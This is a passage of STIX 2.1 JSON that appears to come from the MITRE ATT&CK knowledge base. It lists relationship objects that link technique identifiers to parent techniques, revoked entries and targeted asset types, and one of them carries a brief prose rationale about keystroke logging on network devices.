"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2d0bed1d-342b-44a0-aec8-e6d7c6596fa2", "created": "2023-09-29T16:33:12.887Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:33:12.887Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2d7deb28-0fcf-495b-9d41-01529d356674", "created": "2020-01-30T14:11:41.737Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9", "target_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2dc39956-05d1-4dd5-86db-cb70568d73fe", "created": "2023-09-29T17:39:15.857Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:39:15.857Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2e06f20b-d93a-41b2-a5e3-87d1a4800a9f", "created": "2024-03-07T19:32:36.298Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-03-07T19:32:36.298Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3", "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2e32e0fd-24cf-4a41-b56d-98ada9f1db8a", "created": "2023-09-28T19:40:51.425Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:40:51.425Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2ecf9476-b546-44ff-8547-4ca56cf7eeb8", "created": "2023-09-28T20:02:05.365Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:02:05.365Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2f21c707-0fb8-4f7f-9469-1e16c2b3c9b6", "created": "2020-10-19T19:13:59.737Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5", "target_ref": "attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2f457bef-1721-4e0f-b236-24e4652a31b4", "created": "2023-09-29T16:29:53.181Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:29:53.181Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2f5e76a5-727c-4c83-885c-2844f610f6c8", "created": "2024-05-22T17:15:38.214Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T01:03:46.215Z", "description": "Asset Mapping Rationale: ", "relationship_type": "targets", "source_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2f7c49a0-89fe-4d18-915c-c321868d47bd", "created": "2024-04-09T21:02:56.157Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-04-09T21:02:56.157Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2f973098-ef83-43a5-9813-a5aef8ff48dc", "created": "2020-08-10T13:59:38.625Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327", "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2f9c25af-d2e2-4793-85bf-6e2696384a50", "created": "2023-09-28T20:30:21.865Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:30:21.865Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2fb18a45-8ba0-401d-9ee6-18099b4c2c39", "created": "2021-02-22T14:20:31.751Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--7e7c2fba-7cca-486c-9582-4c1bb2851961", "target_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2fd8a76f-4663-4251-a16d-e1f105a854f9", "created": "2023-09-28T19:43:28.167Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:43:28.167Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2fe222c4-cc81-473d-956e-235e2961a5c3", "created": "2023-09-29T17:04:26.769Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:04:26.769Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--305866af-1f36-49e0-a57d-d5faaf29011c", "created": "2023-09-28T20:34:52.740Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:34:52.740Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--30a29f1a-41ec-4cf2-8d47-07c03c2d96e0", "created": "2023-08-24T17:23:37.162Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-08-24T17:23:37.162Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--30cc6122-1e09-4c0c-8452-d7fd7bb5405a", "created": "2024-05-22T17:23:10.715Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T01:07:27.015Z", "description": "Asset Mapping Rationale: Adversaries may log user keystrokes to intercept credentials as the user types them. Modify System Image may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions", "relationship_type": "targets", "source_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--312cffa6-cdda-48cd-a003-dfd7183355c3", "created": "2020-02-20T22:07:27.659Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--b82f7d37-b826-4ec9-9391-8e121c78aed7", "target_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--31d7e048-92fc-4b63-b0d5-28b64b39797a", "created": "2023-10-02T20:18:11.933Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:18:11.933Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3212de2a-6635-4b95-aeb4-9c0744aed2ce", "created": "2023-09-28T21:16:44.471Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:16:44.471Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--32438a90-406c-40f7-a5ac-a1ca92cd51d5", "created": "2023-09-28T20:26:15.542Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:26:15.542Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--327f65bc-8a33-4dbb-88d4-714a9e42442b", "created": "2023-09-28T21:21:07.833Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:21:07.833Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--32bcf2cf-3311-4ef1-9bf4-4bfe14832b3b", "created": "2023-09-28T20:10:23.215Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:10:23.215Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--32d15d1a-04ba-4035-907a-e2871425e8d1", "created": "2023-09-28T20:28:40.722Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:28:40.722Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--32d35bd7-e09b-4e92-b560-4adb1bac59d5", "created": "2020-01-19T16:10:15.544Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd", "target_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--32d96aee-4192-4c65-81ef-ced7256c3013", "created": "2020-02-20T15:35:00.358Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", "target_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--330c49c0-a785-46f9-99c1-74322e26e20d", "created": "2020-01-23T22:05:32.578Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--9422fc14-1c43-410d-ab0f-a709b76c72dc", "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3334e647-fd5d-481d-a7f9-66f73911a57a", "created": "2023-09-28T19:45:30.291Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:45:30.291Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--33bc3e6f-e8cb-40ea-8088-3de39e2490a7", "created": "2023-09-29T16:47:08.696Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:47:08.696Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--33d1d2c7-fe6e-43c0-a78a-40ec218d0895", "created": "2020-03-13T20:12:41.082Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--33e33c74-2f17-4bac-bbba-bf4f2a2035e5", "created": "2023-09-29T18:07:41.540Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:07:41.540Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--343f8f2b-39d1-48cb-8787-3a6eeab3ddf9", "created": "2020-03-14T22:45:53.101Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", "target_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--34407c81-aca5-477e-a978-a66f32ae6545", "created": "2020-03-14T23:36:52.279Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", "target_ref": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3471632d-253d-469e-9e8c-3b291b4ae88a", "created": "2023-09-28T21:14:15.274Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:14:15.274Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3526acc8-8834-4aaa-87a5-51e587360cf5", "created": "2023-09-29T18:45:47.394Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:45:47.394Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3578dfa3-12cf-4788-aeba-e3478981177b", "created": "2024-03-11T13:37:32.275Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-03-11T13:37:32.275Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--0cc222f5-c3ff-48e6-9f52-3314baf9d37e", "target_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--36710722-d27f-4f4c-99f3-35d46758e861", "created": "2024-05-21T16:21:51.181Z", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-21T16:21:51.182Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", 